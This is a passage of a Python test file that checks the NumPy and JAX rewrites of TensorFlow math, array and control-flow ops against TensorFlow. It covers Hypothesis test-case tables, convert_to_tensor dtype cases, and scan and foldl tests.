        numpy_function=_reduce_logsumexp_no_scipy,
        disabled=JAX_MODE,  # JAX always has scipy.
    ),
    TestCase(
        'math.reduce_max',  # TODO(b/171070692): TF produces nonsense with NaN.
        [array_axis_tuples(allow_nan=False, allow_multi_axis=True)],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_mean', [array_axis_tuples(allow_multi_axis=True)],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_min',  # TODO(b/171070692): TF produces nonsense with NaN.
        [array_axis_tuples(allow_nan=False, allow_multi_axis=True)],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_prod', [
            array_axis_tuples(allow_multi_axis=True),
            array_axis_tuples(dtype=np.int32, allow_multi_axis=True)
        ],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_std',
        [array_axis_tuples(elements=floats(-1e6, 1e6), allow_multi_axis=True)],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_sum', [
            array_axis_tuples(allow_multi_axis=True),
            array_axis_tuples(dtype=np.int32, allow_multi_axis=True)
        ],
        xla_const_args=(1,)),
    TestCase(
        'math.reduce_variance',
        [array_axis_tuples(elements=floats(-1e6, 1e6), allow_multi_axis=True)],
        xla_const_args=(1,)),
    TestCase('math.segment_max', [segment_params()],
             xla_disabled=True),  # No SegmentMax kernel.
    TestCase(
        'math.segment_mean',
        [segment_params()],
        # need jax.numpy.bincount
        disabled=JAX_MODE,
        xla_disabled=True),  # No SegmentMean kernel.
    TestCase('math.segment_min', [segment_params()],
             xla_disabled=True),  # No SegmentMin kernel.
    TestCase('math.segment_prod', [segment_params()],
             xla_disabled=True),  # No SegmentProd kernel.
    TestCase('math.segment_sum', [segment_params()],
             xla_disabled=True),  # TODO(b/165608758): No SegmentSum kernel.

    # ArgSpec(args=['inputs', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase(
        'math.add_n',
        [hps.integers(1, 5).flatmap(lambda n: hps.tuples(n_same_shape(n=n)))]),

    # ArgSpec(args=['inputs', 'shape', 'tensor_dtype', 'name'], varargs=None,
    #         keywords=None, defaults=(None, None, None))
    TestCase('math.accumulate_n', []),

    # ArgSpec(args=['logits', 'axis', 'name'], varargs=None, keywords=None,
    #         defaults=(None, None))
    TestCase(
        'math.log_softmax', [
            single_arrays(
                shape=shapes(min_dims=1),
                elements=floats(
                    min_value=-1e6,
                    max_value=1e6,
                    allow_nan=False,
                    allow_infinity=False))
        ],
        xla_rtol=1e-4),
    TestCase('math.softmax', [
        single_arrays(
            shape=shapes(min_dims=1),
            elements=floats(
                min_value=-1e6,
                max_value=1e6,
                allow_nan=False,
                allow_infinity=False))
    ]),

    # ArgSpec(args=['matrix', 'rhs', 'lower', 'adjoint', 'name'], varargs=None,
    #         keywords=None, defaults=(True, False, None))
    TestCase('linalg.triangular_solve', [
        matmul_compatible_pairs(
            x_strategy=pd_matrices().map(np.linalg.cholesky))
    ]),

    # ArgSpec(args=['shape_x', 'shape_y'], varargs=None, keywords=None,
    #         defaults=None)
    TestCase('broadcast_dynamic_shape', []),
    TestCase('broadcast_static_shape', []),

    # ArgSpec(args=['value', 'dtype', 'dtype_hint', 'name'], varargs=None,
    #         keywords=None, defaults=(None, None, None))
    TestCase('convert_to_tensor', [single_arrays()]),

    # ArgSpec(args=['x', 'axis', 'exclusive', 'reverse', 'name'], varargs=None,
    #         keywords=None, defaults=(0, False, False, None))
    TestCase(
        'math.cumprod', [
            hps.tuples(array_axis_tuples(), hps.booleans(),
                       hps.booleans()).map(lambda x: x[0] + (x[1], x[2]))
        ],
        xla_const_args=(1, 2, 3)),
    TestCase(
        'math.cumsum', [
            hps.tuples(
                array_axis_tuples(
                    elements=floats(min_value=-1e12, max_value=1e12)),
                hps.booleans(),
                hps.booleans()).map(lambda x: x[0] + (x[1], x[2]))
        ],
        xla_const_args=(1, 2, 3)),
]
# Continuation of the table above, split into a second literal so pylint does
# not time out analyzing one huge list.
NUMPY_TEST_CASES += [  # break the array for pylint to not timeout.

    # args=['input', 'name']
    TestCase('linalg.adjoint', [
        single_arrays(
            shape=shapes(min_dims=2),
            dtype=np.complex64,
            elements=complex_numbers())
    ]),
    TestCase('linalg.slogdet', [nonsingular_matrices()],
             xla_disabled=True),  # TODO(b/162937268): No kernel.
    # ArgSpec(args=['x', 'name'], varargs=None, keywords=None, defaults=(None,))
    TestCase('complex', [
        n_same_shape(n=2, dtype=np.float32),
        n_same_shape(n=2, dtype=np.float64)
    ]),
    TestCase('math.abs', [single_arrays()]),
    TestCase('math.acos', [single_arrays(elements=floats(-1., 1.))]),
    TestCase('math.acosh', [single_arrays(elements=positive_floats())]),
    TestCase('math.asin', [single_arrays(elements=floats(-1., 1.))]),
    TestCase('math.asinh', [single_arrays(elements=positive_floats())]),
    TestCase('math.atan', [single_arrays()]),
    TestCase('math.atanh', [single_arrays(elements=floats(-1., 1.))]),
    TestCase(
        'math.bessel_i0', [single_arrays(elements=floats(-50., 50.))],
        disabled=JAX_MODE,
        xla_disabled=True),  # Missing BesselI0 kernel.
    TestCase('math.bessel_i0e', [single_arrays(elements=floats(-50., 50.))]),
    TestCase(
        'math.bessel_i1', [single_arrays(elements=floats(-50., 50.))],
        disabled=JAX_MODE,
        xla_disabled=True),  # Missing BesselI1 kernel.
    TestCase('math.bessel_i1e', [single_arrays(elements=floats(-50., 50.))]),
    TestCase('math.ceil', [single_arrays()]),
    TestCase('math.conj',
             [single_arrays(dtype=np.complex64, elements=complex_numbers())]),
    TestCase('math.cos', [single_arrays()]),
    TestCase('math.cosh', [single_arrays(elements=floats(-100., 100.))]),
    TestCase('math.digamma',
             [single_arrays(elements=non_zero_floats(-1e4, 1e4))],
             rtol=5e-5),
    TestCase('math.erf', [single_arrays()]),
    TestCase('math.erfc', [single_arrays()]),
    TestCase('math.erfinv', [single_arrays(elements=floats(-1., 1.))]),
    TestCase(
        'math.exp',  # TODO(b/147394924): max_value=1e3
        [single_arrays(elements=floats(min_value=-1e3, max_value=85))]),
    TestCase('math.expm1',
             [single_arrays(elements=floats(min_value=-1e3, max_value=1e3))]),
    TestCase('math.floor', [single_arrays()]),
    TestCase('math.is_finite', [single_arrays()]),
    TestCase('math.is_inf', [single_arrays()]),
    TestCase('math.is_nan', [single_arrays()]),
    TestCase('math.lgamma', [single_arrays(elements=positive_floats())]),
    TestCase('math.log', [single_arrays(elements=positive_floats())]),
    TestCase('math.log1p',
             [single_arrays(elements=floats(min_value=-1 + 1e-6))],
             xla_atol=1e-4, xla_rtol=1e-4),
    TestCase('math.log_sigmoid',
             [single_arrays(elements=floats(min_value=-100.))],
             xla_atol=1e-4, xla_rtol=1e-4),
    TestCase('math.logical_not',
             [single_arrays(dtype=np.bool_, elements=hps.booleans())]),
    TestCase('math.ndtri', [single_arrays(elements=floats(0., 1.))]),
    TestCase('math.negative', [single_arrays()]),
    TestCase('math.reciprocal', [single_arrays()]),
    TestCase('math.rint', [single_arrays()]),
    TestCase('math.round', [single_arrays()]),
    TestCase('math.rsqrt', [single_arrays(elements=positive_floats())]),
    TestCase('math.sigmoid', [single_arrays()]),
    TestCase('math.sign', [single_arrays()]),
    TestCase('math.sin', [single_arrays()]),
    TestCase('math.sinh', [single_arrays(elements=floats(-100., 100.))]),
    TestCase('math.softplus', [single_arrays()]),
    TestCase('math.sqrt', [single_arrays(elements=positive_floats())]),
    TestCase('math.square', [single_arrays()]),
    TestCase('math.tan', [single_arrays()]),
    TestCase('math.tanh', [single_arrays()]),

    # ArgSpec(args=['x', 'q', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('math.zeta', []),

    # ArgSpec(args=['x', 'y', 'name'], varargs=None, keywords=None,
    #         defaults=(None,))
    TestCase('math.add', [n_same_shape(n=2)]),
    TestCase('math.atan2', [n_same_shape(n=2)]),
    TestCase('math.divide',
             [n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
    TestCase('math.divide_no_nan', [n_same_shape(n=2)]),
    TestCase('math.equal', [n_same_shape(n=2)]),
    TestCase('math.floordiv',
             # Clip numerator above zero to avoid NP/TF discrepancy in rounding
             # negative subnormal floats.
             [n_same_shape(
                 n=2, elements=[positive_floats(), non_zero_floats()])]),
    TestCase('math.floormod',
             [n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
    TestCase('math.greater', [n_same_shape(n=2)]),
    TestCase('math.greater_equal', [n_same_shape(n=2)]),
    TestCase('math.less', [n_same_shape(n=2)]),
    TestCase('math.less_equal', [n_same_shape(n=2)]),
    TestCase('math.logical_and',
             [n_same_shape(n=2, dtype=np.bool_, elements=hps.booleans())]),
    TestCase('math.logical_or',
             [n_same_shape(n=2, dtype=np.bool_, elements=hps.booleans())]),
    TestCase('math.logical_xor',
             [n_same_shape(n=2, dtype=np.bool_, elements=hps.booleans())]),
    TestCase('math.maximum', [n_same_shape(n=2)]),
    TestCase('math.minimum', [n_same_shape(n=2)]),
    TestCase('math.multiply', [n_same_shape(n=2)]),
    TestCase('math.multiply_no_nan', [n_same_shape(n=2)]),
    TestCase('math.not_equal', [n_same_shape(n=2)]),
    TestCase(
        'math.pow',
        [n_same_shape(n=2, elements=[floats(-1e3, 1e3),
                                     floats(-10., 10.)])]),
    TestCase('math.squared_difference', [n_same_shape(n=2)]),
    TestCase('math.subtract', [n_same_shape(n=2)]),
    TestCase('math.truediv',
             [n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
    TestCase('math.xdivy',
             [n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
    TestCase('math.xlogy',
             [n_same_shape(n=2, elements=[floats(), positive_floats()])]),
    TestCase('math.xlog1py',
             [n_same_shape(n=2, elements=[floats(), positive_floats()])]),
    TestCase('nn.conv2d', [conv2d_params()], disabled=NUMPY_MODE),
    TestCase(
        'nn.sparse_softmax_cross_entropy_with_logits', [sparse_xent_params()],
        rtol=1e-4,
        atol=1e-4),
    TestCase(
        'nn.softmax_cross_entropy_with_logits', [xent_params()],
        rtol=1e-4,
        atol=1e-4),
    TestCase(
        'random.categorical', [
            hps.tuples(
                single_arrays(
                    shape=shapes(min_dims=2, max_dims=2),
                    elements=floats(min_value=-1e3, max_value=1e3)),
                hps.integers(0, 10))
        ],
        jax_kwargs=_add_jax_prng_key_as_seed,
        assert_shape_only=True),
    TestCase(
        'random.gamma', [gamma_params()],
        jax_kwargs=_add_jax_prng_key_as_seed,
        assert_shape_only=True,
        xla_disabled=True),  # No XLA kernel (we use a py rejection sampler).
    TestCase(
        'random.normal', [normal_params()],
        jax_kwargs=_add_jax_prng_key_as_seed,
        assert_shape_only=True),
    TestCase(
        'random.uniform', [uniform_params()],
        jax_kwargs=_add_jax_prng_key_as_seed,
        assert_shape_only=True),

    # Array ops.
    TestCase('gather', [gather_params()],
             xla_const_args=(2, 3, 4)),  # validate_indices, axis, batch_dims
    TestCase('gather_nd', [gather_nd_params()],
             xla_const_args=(2,)),  # batch_dims
    TestCase(
        'repeat', [repeat_params()], xla_const_args=(1, 2),
        xla_disabled=True),  # TF op is XLA-incompatible (boolean mask)
    TestCase('searchsorted', [searchsorted_params()], xla_const_args=(2,)),
    TestCase('linspace', [linspace_params()], xla_const_args=('num', 'axis')),
    TestCase('one_hot', [one_hot_params()]),
    TestCase('slice', [sliceable_and_slices()], xla_const_args=(1, 2)),
    TestCase('compat.v1.where', [where_params(version=1)]),
    TestCase('where', [where_params(version=2)]),

    # Misc
    TestCase(
        'histogram_fixed_width', [histogram_fixed_width_params()],
        xla_disabled=True),
    TestCase('histogram_fixed_width_bins',
             [histogram_fixed_width_bins_params()]),
    TestCase('argsort', [argsort_params()],
             xla_const_args=(1, 2, 3)),  # axis, direction, stable-sort
]
def _maybe_convert_to_tensors(args):
  """Converts `np.ndarray` leaves of the `args` nest to `tf.Tensor`s.

  Ensures we go from JAX np -> original np -> tf.Tensor. (no-op for non-JAX.)
  Non-ndarray leaves (e.g. Python ints used as constant args) pass through
  unchanged.

  Args:
    args: An arbitrary nest (as understood by `tf.nest`) of arguments.

  Returns:
    A nest of the same structure with each `np.ndarray` leaf replaced by a
    `tf.Tensor` of the same values and dtype.
  """
  def convert(a):
    # Materialize through original NumPy once; the previous version called
    # `onp.array(a)` twice per leaf (once for the values, once for the dtype).
    a = onp.array(a)
    return tf.convert_to_tensor(a, a.dtype)
  return tf.nest.map_structure(
      lambda arg: convert(arg) if isinstance(arg, np.ndarray) else arg,
      args)
# Parameterized cases for `NumpyTest.test_convert_to_tensor` below. Each dict
# supports the following keys (see the test body for exact usage):
#   value:      object passed to `nptf.convert_to_tensor`.
#   in_dtype:   if set, `value` is first converted to a tensor of this dtype.
#   dtype / dtype_hint: forwarded to `nptf.convert_to_tensor`.
#   out_dtype / out_value: expected dtype / value of the result.
#   error:      expected exception type (used instead of out_* keys).
CONVERT_TO_TENSOR_TESTS = [
    # bool tests
    dict(testcase_name='bool',
         value=True, out_dtype=nptf.bool),
    dict(testcase_name='bool_with_int32_dtype',
         value=True, out_dtype=nptf.int32, dtype=nptf.int32),
    dict(testcase_name='bool_with_int64_dtype',
         value=True, out_dtype=nptf.int64, dtype=nptf.int64),
    dict(testcase_name='bool_with_float32_dtype',
         value=True, out_dtype=nptf.float32, dtype=nptf.float32),
    dict(testcase_name='bool_with_float64_dtype',
         value=True, out_dtype=nptf.float64, dtype=nptf.float64),
    dict(testcase_name='bool_with_complex64_dtype_should_error',
         value=True, dtype=nptf.complex64, error=TypeError),
    dict(testcase_name='bool_with_complex64_hint',
         value=True, out_dtype=nptf.bool, dtype_hint=nptf.complex64),
    # int tests
    dict(testcase_name='int',
         value=1, out_dtype=nptf.int32),
    dict(testcase_name='int_with_float32_dtype',
         value=1, out_dtype=nptf.float32, dtype=nptf.float32),
    # int can be cast into other types
    dict(testcase_name='int_with_float32_hint',
         value=1, out_dtype=nptf.float32, dtype_hint=nptf.float32),
    dict(testcase_name='int64',
         value=2 ** 63 - 1, out_dtype=nptf.int64),
    dict(testcase_name='int64_to_int32_should_underflow',
         value=2 ** 63 - 1, dtype=np.int32, out_dtype=nptf.int32, out_value=-1),
    dict(testcase_name='int_with_complex64_dtype',
         value=1, out_dtype=nptf.complex64, dtype=nptf.complex64),
    dict(testcase_name='int_with_complex64_hint',
         value=1, out_dtype=nptf.complex64, dtype_hint=nptf.complex64),
    # float tests
    dict(testcase_name='float',
         value=1., out_dtype=nptf.float32),
    dict(testcase_name='float_with_float64_dtype',
         value=1., out_dtype=nptf.float64, dtype=nptf.float64),
    # float can be cast into complex types but not int types
    dict(testcase_name='float_with_complex64_dtype',
         value=1., out_dtype=nptf.complex64, dtype=nptf.complex64),
    dict(testcase_name='float_with_complex64_dtype_hint',
         value=1., out_dtype=nptf.complex64, dtype_hint=nptf.complex64),
    dict(testcase_name='float_with_complex128_dtype',
         value=1., out_dtype=nptf.complex128, dtype=nptf.complex128),
    dict(testcase_name='float_to_bool_dtype_should_error',
         value=1., dtype=nptf.bool, error=TypeError),
    dict(testcase_name='float_to_int32_dtype_should_error',
         value=1., dtype=nptf.int32, error=TypeError),
    dict(testcase_name='float_to_int32_dtype_hint',
         value=1., out_dtype=nptf.float32, dtype_hint=nptf.int32),
    dict(testcase_name='float_to_int64_dtype_should_error',
         value=1., dtype=nptf.int32, error=TypeError),
    dict(testcase_name='float_with_int32_hint',
         value=1., out_dtype=nptf.float32, dtype_hint=nptf.int32),
    # complex can be cast into complex types but not other types
    dict(testcase_name='complex',
         value=1 + 0j, out_dtype=nptf.complex128),
    dict(testcase_name='complex_with_complex64_dtype',
         value=1 + 0j, out_dtype=nptf.complex64, dtype=nptf.complex64),
    dict(testcase_name='complex_with_bool_dtype_should_error',
         value=1 + 0j, dtype=nptf.bool, error=TypeError),
    dict(testcase_name='complex_with_bool_hint_should_error',
         value=1 + 0j, out_dtype=nptf.complex128, dtype_hint=nptf.bool),
    dict(testcase_name='complex_with_float32_dtype_should_error',
         value=1 + 0j, dtype=nptf.float32, error=TypeError),
    dict(testcase_name='complex_with_float32',
         value=1 + 0j, out_dtype=nptf.complex128, dtype_hint=nptf.float32),
    dict(testcase_name='complex_with_int32_dtype_should_error',
         value=1 + 0j, dtype=nptf.int32, error=TypeError),
    dict(testcase_name='complex_with_int32_hint',
         value=1 + 0j, out_dtype=nptf.complex128, dtype_hint=nptf.int32),
    # Empty iterables should be float32 by default
    dict(testcase_name='empty_list',
         value=[], out_dtype=nptf.float32),
    dict(testcase_name='empty_list_with_float64_dtype',
         value=[], out_dtype=nptf.float64, dtype=nptf.float64),
    dict(testcase_name='empty_list_with_int32_hint',
         value=[], out_dtype=nptf.int32, dtype_hint=nptf.int32),
    dict(testcase_name='empty_tuple',
         value=(), out_dtype=nptf.float32),
    dict(testcase_name='empty_tuple_with_float64_dtype',
         value=(), out_dtype=nptf.float64, dtype=nptf.float64),
    dict(testcase_name='empty_tuple_with_int32_hint',
         value=(), out_dtype=nptf.int32, dtype_hint=nptf.int32),
    # Iterables with contents should use dtypes of contents
    dict(testcase_name='list_of_ints',
         value=[1], out_dtype=nptf.int32),
    dict(testcase_name='nested_list_of_ints',
         value=[[1]], out_dtype=nptf.int32),
    dict(testcase_name='nested_list_of_bools',
         value=[[True]], out_dtype=nptf.bool),
    dict(testcase_name='nested_list_of_floats',
         value=[[1.]], out_dtype=nptf.float32),
    dict(testcase_name='list_of_ints_with_int32_dtype',
         value=[1], out_dtype=nptf.int32, dtype=nptf.int32),
    dict(testcase_name='list_of_ints_with_int32_hint',
         value=[1], out_dtype=nptf.int32, dtype_hint=nptf.int32),
    dict(testcase_name='list_of_ints_with_float32_dtype',
         value=[1], out_dtype=nptf.float32, dtype=nptf.float32),
    dict(testcase_name='list_of_ints_with_float32_hint',
         value=[1], out_dtype=nptf.float32, dtype_hint=nptf.float32),
    dict(testcase_name='list_of_ints_with_complex128_dtype',
         value=[1], out_dtype=nptf.complex128, dtype=nptf.complex128),
    dict(testcase_name='list_of_ints_with_complex128_hint',
         value=[1], out_dtype=nptf.complex128, dtype_hint=nptf.complex128),
    dict(testcase_name='list_of_floats',
         value=[1.], out_dtype=nptf.float32),
    dict(testcase_name='list_of_floats_with_int32_dtype_should_error',
         value=[1.], dtype=nptf.int32, error=TypeError),
    dict(testcase_name='list_of_floats_with_int32_hint',
         value=[1.], out_dtype=nptf.float32, dtype_hint=nptf.int32),
    dict(testcase_name='list_of_int_bool',
         value=[1, True], out_dtype=nptf.int32),
    dict(testcase_name='list_of_bool_int_should_error',
         value=[True, 1], error=ValueError),
    dict(testcase_name='list_of_int_bool_with_int32_dtype',
         value=[1, True], dtype=nptf.int32, out_dtype=nptf.int32),
    dict(testcase_name='list_of_int_bool_with_bool_dtype_should_error',
         value=[1, True], dtype=nptf.bool, error=TypeError),
    dict(testcase_name='list_of_int_float',
         value=[1, 2.], out_dtype=nptf.float32),
    dict(testcase_name='list_of_int_float_with_int32_dtype_should_error',
         value=[1, 2.], dtype=nptf.int32, error=TypeError),
    dict(testcase_name='list_of_int_float_with_int32_hint',
         value=[1, 2.], out_dtype=nptf.float32, dtype_hint=nptf.int32),
    dict(testcase_name='list_of_float_int_with_int32_dtype_should_error',
         value=[1., 2], dtype=nptf.int32, error=TypeError),
    dict(testcase_name='list_of_float_int_with_int32_hint',
         value=[1., 2], out_dtype=nptf.float32, dtype_hint=nptf.int32),
    # List of complex is more strict than list float and int
    dict(testcase_name='list_of_complex_and_bool_should_error',
         value=[1 + 2j, True], error=ValueError),
    dict(testcase_name='list_of_bool_and_complex_should_error',
         value=[True, 1 + 2j], error=ValueError),
    dict(testcase_name='list_of_complex_and_float_should_error',
         value=[1 + 2j, 1.], error=ValueError),
    dict(testcase_name='list_of_float_and_complex_should_error',
         value=[1., 1 + 2j], error=ValueError),
    dict(testcase_name='list_of_complex_and_int_should_error',
         value=[1 + 2j, 1], error=ValueError),
    dict(testcase_name='list_of_int_and_complex_should_error',
         value=[1, 1 + 2j], error=ValueError),
    # Convert tensors to tensors
    dict(testcase_name='int32_tensor',
         value=1, in_dtype=nptf.int32, out_dtype=nptf.int32),
    dict(testcase_name='int32_tensor_with_int32_dtype',
         value=1, in_dtype=nptf.int32, dtype=nptf.int32, out_dtype=nptf.int32),
    dict(testcase_name='int32_tensor_with_int64_hint',
         value=1, in_dtype=nptf.int32, dtype_hint=nptf.int32,
         out_dtype=nptf.int32),
    dict(testcase_name='int32_tensor_with_float64_hint',
         value=1, in_dtype=nptf.int32, dtype_hint=nptf.int32,
         out_dtype=nptf.int32),
    # Convert registered objects
    dict(testcase_name='dimension',
         value=nptf.compat.v1.Dimension(1), out_dtype=nptf.int32),
    dict(testcase_name='dimension_with_int64_dtype',
         value=nptf.compat.v1.Dimension(1), dtype=nptf.int64,
         out_dtype=nptf.int64),
    dict(testcase_name='dimension_with_float32_dtype_should_error',
         value=nptf.compat.v1.Dimension(1), dtype=nptf.float32,
         error=TypeError),
    dict(testcase_name='dimension_with_float32_hint',
         value=nptf.compat.v1.Dimension(1), dtype_hint=nptf.float32,
         out_dtype=nptf.int32),
    dict(testcase_name='empty_tensorshape',
         value=nptf.TensorShape([]), out_dtype=nptf.int32),
    dict(testcase_name='empty_tensorshape_with_float32_dtype_should_error',
         value=nptf.TensorShape([]), dtype=nptf.float32, error=TypeError),
    dict(testcase_name='tensorshape',
         value=nptf.TensorShape((1, 2)), out_dtype=nptf.int32),
    dict(testcase_name='tensorshape_with_float32_dtype_should_error',
         value=nptf.TensorShape((1, 2)), dtype=nptf.float32, error=TypeError),
    # Dimensions too large for int32 must widen to int64.
    dict(testcase_name='tensorshape_with_large_dimension_should_be_int64',
         value=nptf.TensorShape([2 ** 31]), out_dtype=nptf.int64),
    dict(testcase_name=('tensorshape_with_large_dimension_with_int32'
                        '_dtype_should_error'),
         value=nptf.TensorShape([2 ** 31]), dtype=nptf.int32, error=ValueError)
]
# Backend-specific cases: JAX tensors are immutable-dtype, so changing the
# dtype of an existing tensor errors there but silently casts in NumPy.
if JAX_MODE:
  CONVERT_TO_TENSOR_TESTS += [
      # Tests for converting onp arrays to tensors
      dict(testcase_name='float32',
           value=onp.float32(1.), out_dtype=nptf.float32),
      dict(testcase_name='float32_with_int32_dtype',
           value=onp.float32(1.), dtype=nptf.int32, out_dtype=nptf.int32),
      dict(testcase_name='float32_with_int32_hint',
           value=onp.float64(1.), dtype_hint=nptf.int32, out_dtype=nptf.int32),
      dict(testcase_name='empty_ndarray',
           value=onp.array([]), out_dtype=nptf.float64),
      dict(testcase_name='empty_float32_ndarray',
           value=onp.array([], dtype=onp.float32), out_dtype=nptf.float32),
      dict(testcase_name='empty_float64_ndarray_with_int32_dtype',
           value=onp.array([], dtype=onp.float64), out_dtype=nptf.float32,
           dtype=nptf.float32),
      # NumPy arrays get cast
      dict(testcase_name='float64_ndarray_to_int32',
           value=onp.array([1], dtype=onp.float64), out_dtype=nptf.int32,
           dtype=nptf.int32),
      dict(testcase_name='complex64_ndarray_to_int32',
           value=onp.array([1], dtype=onp.complex64), out_dtype=nptf.int32,
           dtype=nptf.int32),
      dict(testcase_name='complex128_ndarray_to_float32',
           value=onp.array([1], dtype=onp.complex128), out_dtype=nptf.float32,
           dtype=nptf.float32),
      # JAX will error when trying to change dtypes of tensors
      dict(testcase_name='int32_tensor_with_int64_dtype_should_error',
           value=1, in_dtype=nptf.int32, dtype=nptf.int64, error=TypeError),
      dict(testcase_name='int32_tensor_with_float64_dtype_should_error',
           value=1, in_dtype=nptf.int32, dtype=nptf.float64, error=TypeError),
  ]
else:
  CONVERT_TO_TENSOR_TESTS += [
      # NumPy should not error when trying to change dtypes of tensors
      dict(testcase_name='int32_tensor_with_int64_dtype_should_not_error',
           value=1, in_dtype=nptf.int32, dtype=nptf.int64,
           out_dtype=nptf.int64),
      dict(testcase_name='int32_tensor_with_float64_dtype_should_not_error',
           value=1, in_dtype=nptf.int32, dtype=nptf.float64,
           out_dtype=nptf.float64),
  ]
class NumpyTest(test_util.TestCase):
  """Checks NumPy/JAX rewrites of TF ops for consistency with TensorFlow.

  `testConsistency` drives Hypothesis strategies from `NUMPY_TEST_CASES`,
  evaluating each op under TensorFlow and under the rewritten backend (and
  optionally under XLA / TPU) and comparing dtypes, shapes, and values.
  """

  # Lazily-constructed TPU strategy, shared across tests (see `tpu_strategy`).
  _cached_strategy = None

  @parameterized.named_parameters(CONVERT_TO_TENSOR_TESTS)
  def test_convert_to_tensor(self, value=None, out_value=None, out_dtype=None,
                             in_dtype=None, dtype=None, dtype_hint=None,
                             error=None):
    """Checks `nptf.convert_to_tensor` dtype inference / casting / errors."""
    if in_dtype:
      value = nptf.convert_to_tensor(value, dtype=in_dtype)
    if not error:
      out = nptf.convert_to_tensor(value, dtype=dtype, dtype_hint=dtype_hint)
      if out_dtype:
        self.assertEqual(out_dtype, out.dtype)
      if out_value is not None:
        self.assertEqual(out_value, out)
    else:
      with self.assertRaises(error):
        nptf.convert_to_tensor(value, dtype=dtype, dtype_hint=dtype_hint)

  def test_nested_stack_to_tensor(self):
    # Regression check: stacking nested lists of float64 scalars must not
    # silently downcast to the default float32.
    state = nptf.cast([2., 3.], nptf.float64)
    self.assertEqual(nptf.float64,
                     nptf.stack([
                         [0., 1.],
                         [-2000. * state[0] * state[1] - 1.,
                          1000. * (1. - state[0]**2)]]).dtype)

  def test_concat_infers_dtype(self):
    self.assertEqual(np.int32, nptf.concat([[1], []], 0).dtype)
    self.assertEqual(np.float32, nptf.concat([[], [1]], 0).dtype)

  def test_concat_ignores_onp_dtype(self):
    # Mixing an original-NumPy array in should not promote to float64.
    if not JAX_MODE:
      self.skipTest('Test only applies to JAX backend.')
    self.assertEqual(
        nptf.float32, nptf.concat([onp.zeros(1), nptf.zeros(1)], 0).dtype)

  def test_reduce_logsumexp_errors_on_int_dtype(self):
    with self.assertRaises(TypeError):
      nptf.reduce_logsumexp(nptf.convert_to_tensor([1, 2, 3], dtype=nptf.int32))

  def test_while_loop_gradients(self):
    """Gradients must flow through `nptf.while_loop` (JAX only)."""
    if not JAX_MODE:
      self.skipTest('Cannot take gradients in NumPy.')

    def _fn(x):

      def _cond_fn(i, _):
        return i < 3.

      def _body_fn(i, val):
        return i + 1, val + 1.

      return nptf.while_loop(
          cond=_cond_fn, body=_body_fn, loop_vars=(0, x),
          maximum_iterations=5)[1]

    _, grad = tfp.math.value_and_gradient(_fn, 0.)
    self.assertIsNotNone(grad)

  def test_scan_no_initializer(self):
    elems = np.arange(5).astype(np.int32)
    self.assertAllEqual(
        self.evaluate(tf.scan(lambda x, y: x + y, elems)),
        nptf.scan(lambda x, y: x + y, elems))

  def test_scan_with_initializer(self):
    elems = np.arange(5).astype(np.int32)
    self.assertAllEqual(
        self.evaluate(tf.scan(lambda x, y: x + y, elems, initializer=7)),
        nptf.scan(lambda x, y: x + y, elems, initializer=7))

  def test_scan_with_struct(self):
    elems = np.arange(5).astype(np.int32)
    self.assertAllEqual(
        self.evaluate(tf.scan(
            lambda x, y: (x[0] + y, x[1] - y), elems, initializer=(7, 3))),
        nptf.scan(lambda x, y: (x[0] + y, x[1] - y), elems, initializer=(7, 3)))

  def test_scan_with_struct_elems(self):
    elems = (np.arange(5).astype(np.int32),
             np.arange(10).astype(np.int32).reshape(5, 2))
    init = (np.int32([7, 8]), np.int32([9, 1]))
    self.assertAllEqual(
        self.evaluate(tf.scan(
            lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init)),
        nptf.scan(
            lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init))

  def test_scan_with_struct_elems_reverse(self):
    elems = (np.arange(5).astype(np.int32),
             np.arange(10).astype(np.int32).reshape(5, 2))
    init = (np.int32([7, 8]), np.int32([9, 1]))
    self.assertAllEqual(
        self.evaluate(tf.scan(
            lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init,
            reverse=True)),
        nptf.scan(
            lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init,
            reverse=True))

  def test_foldl_no_initializer(self):
    elems = np.arange(5).astype(np.int32)
    fn = lambda x, y: x + y
    self.assertAllEqual(
        self.evaluate(tf.foldl(fn, elems)),
        nptf.foldl(fn, elems))

  def test_foldl_initializer(self):
    elems = np.arange(5).astype(np.int32)
    fn = lambda x, y: x + y
    self.assertAllEqual(
        self.evaluate(tf.foldl(fn, elems, initializer=7)),
        nptf.foldl(fn, elems, initializer=7))

  def test_foldl_struct(self):
    elems = np.arange(5).astype(np.int32)
    fn = lambda x, y: (x[0] + y, x[1] - y)
    init = (0, 0)
    self.assertAllEqual(
        self.evaluate(tf.foldl(fn, elems, initializer=init)),
        nptf.foldl(fn, elems, initializer=init))

  def test_foldl_struct_mismatched(self):
    # Structured elems with mismatched leading sizes must be rejected.
    elems = (np.arange(3).astype(np.int32),
             np.arange(10).astype(np.int32).reshape(5, 2))
    init = np.zeros_like(elems[1][0])
    fn = lambda x, y_z: x + y_z[0] - y_z[1]
    # `assertRaisesRegex` replaces the deprecated `assertRaisesRegexp` alias.
    with self.assertRaisesRegex(ValueError, r'.*size.*'):
      nptf.foldl(fn, elems, initializer=init)

  def test_foldl_struct_in_single_out(self):
    elems = (np.arange(5).astype(np.int32),
             np.arange(10).astype(np.int32).reshape(5, 2))
    init = np.zeros_like(elems[1][0])
    fn = lambda x, y_z: x + y_z[0] - y_z[1]
    self.assertAllEqual(
        self.evaluate(tf.foldl(fn, elems, initializer=init)),
        nptf.foldl(fn, elems, initializer=init))

  def test_foldl_struct_in_alt_out(self):
    elems = (np.arange(5).astype(np.int32),
             np.arange(10).astype(np.int32).reshape(5, 2))
    init = dict(a=np.int32(0),
                b=np.zeros_like(elems[1][0]),
                c=np.zeros_like(elems[1][0]))
    fn = lambda x, y_z: dict(a=x['a'] + y_z[0], b=x['b'] + y_z[1], c=y_z[1])
